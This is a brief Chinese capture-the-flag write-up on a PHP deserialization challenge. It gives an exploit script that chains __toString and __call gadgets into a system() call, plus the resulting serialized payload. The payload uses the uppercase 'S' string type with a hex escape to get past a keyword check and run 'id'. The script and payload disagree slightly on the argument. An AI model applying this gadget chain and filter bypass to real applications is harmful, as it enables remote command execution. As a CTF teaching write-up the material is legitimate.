这题解法很多,两个类就行了,KSEC_CTF_2026用S解析绕过,exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
 <?php

class GateKeeper
{
    public $passcode = "KSEC_CTF_2026";
    public $target;

    public function __wakeup()
    {
        if ($this->passcode !== "KSEC_CTF_2026") {
            die("Access Denied! Invalid passcode.");
        }
    }

    public function __toString()
    {
        return $this->target->process();
    }
}

class MethodHandler
{
    public $method = "system";
    public $args = "i";

    public function __call($name, $arguments)
    {
        if ($name === 'process') {
            $func = $this->method;
            return $func($this->args);
        }
        return null;
    }
}

$a = new GateKeeper();
$a->target = new MethodHandler();

echo serialize($a);

?> No data provided.

O:10:"GateKeeper":2:{s:8:"passcode";S:13:"\4bSEC_CTF_2026";s:6:"target";O:13:"MethodHandler":2:{s:6:"method";s:6:"system";s:4:"args";s:2:"id";}}